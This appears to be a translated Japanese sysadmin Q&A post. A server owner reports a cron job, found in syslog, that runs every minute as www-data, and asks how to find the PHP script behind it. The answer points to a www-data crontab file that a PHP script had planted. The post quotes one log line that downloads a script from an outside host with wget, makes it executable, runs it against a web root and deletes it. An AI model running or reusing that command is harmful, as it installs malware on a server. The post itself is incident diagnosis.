システムログでPHPマルウェアを発見

システムログでPHPマルウェアを発見

1分ごとに実行されるマルウェアがあり、/var/log/syslogで見ることができます。

Feb  1 18:30:01 MENCH CRON[1768]: (www-data) CMD (wget -q -O xxxd http://hello.hahaha666.xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /var/www/website.com 24 && rm -f xxxd)

どのPHPスクリプトが実行されているのか、どうすればわかりますか?

サーバーにはnginx、php fpm、4つの小さなウェブサイトとmysqlだけがあります。それだけです。

修正する nginxを停止すると、呼び出しは1分ごとに実行され続けます。

答え1

一部のPHPスクリプトによって生成された/var/spool/cron/crontabsにwww-dataファイルがあります。解決済み

関連情報